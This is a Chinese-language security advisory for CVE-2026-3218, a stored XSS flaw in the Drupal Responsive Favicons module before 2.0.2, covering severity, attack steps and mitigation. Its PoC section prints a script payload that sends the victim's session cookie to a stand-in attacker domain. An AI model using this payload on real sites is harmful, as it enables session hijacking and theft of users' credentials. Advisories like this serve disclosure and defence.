CVE-2026-3218 CVSS 4.8 中危

CVE-2026-3218 Drupal Responsive Favicons 存储型XSS漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3218

漏洞类型

跨站脚本 (XSS)

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Drupal Responsive Favicons

漏洞概述

Drupal Responsive Favicons模块存在跨站脚本（XSS）漏洞。该漏洞源于Web页面生成过程中未对用户输入进行适当的中性化处理。受影响的产品版本为2.0.2之前的所有版本。由于需要高权限才能注入恶意代码，且需要用户交互才能触发，因此风险被评定为中危。成功利用该漏洞可能导致攻击者在受害者浏览器中执行恶意脚本。

技术细节

该漏洞属于存储型跨站脚本（Stored XSS）。Drupal Responsive Favicons模块在处理网站图标（Favicon）配置时，未对特定字段（如图标路径或描述）进行严格的输入验证和过滤。具有高权限（如管理员）的攻击者可以在模块配置页面注入恶意JavaScript代码。当其他用户访问包含该图标的页面或管理后台时，恶意脚本将在其浏览器上下文中执行。由于CVSS向量包含S:C（范围变更），该漏洞可能影响浏览器上下文之外的安全属性，例如窃取Session ID、重定向用户或执行针对站内其他请求的操作。

攻击链分析

STEP 1

步骤1：获取高权限

攻击者通过合法或非法手段获取Drupal网站的高权限账户（如管理员权限）。

STEP 2

步骤2：访问配置页面

攻击者登录后台，导航至Responsive Favicons模块的配置设置页面。

STEP 3

步骤3：注入恶意载荷

攻击者在配置输入框（如Favicon文件路径或标题）中输入构造好的XSS Payload并保存。

STEP 4

步骤4：触发漏洞

诱导其他管理员或用户访问渲染了该Favicon的页面或配置页面。

STEP 5

步骤5：执行恶意代码

受害者的浏览器解析未经过滤的输入，执行恶意JavaScript代码，导致Cookie窃取或会话劫持。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for Drupal Responsive Favicons XSS
Context: Injecting into a configuration field (e.g., Favicon path)
-->
"><script>
// Attempt to capture the current user's session cookie
var request = new XMLHttpRequest();
request.open('GET', 'http://attacker-controlled-domain.com/log?cookie=' + encodeURIComponent(document.cookie), true);
request.send();
</script>

影响范围

Drupal Responsive Favicons < 2.0.2

防御指南

临时缓解措施

建议立即升级模块到修复版本。如果无法立即升级，应暂时禁用Responsive Favicons模块以减少攻击面。同时，审查模块配置中是否有任何异常的脚本标签，并定期检查管理员日志以发现异常活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-3218
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-3218
3 Details https://www.cvedetails.com/cve/CVE-2026-3218/
4 VulDB https://vuldb.com/cve/CVE-2026-3218
5 Link https://www.drupal.org/sa-contrib-2026-019

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表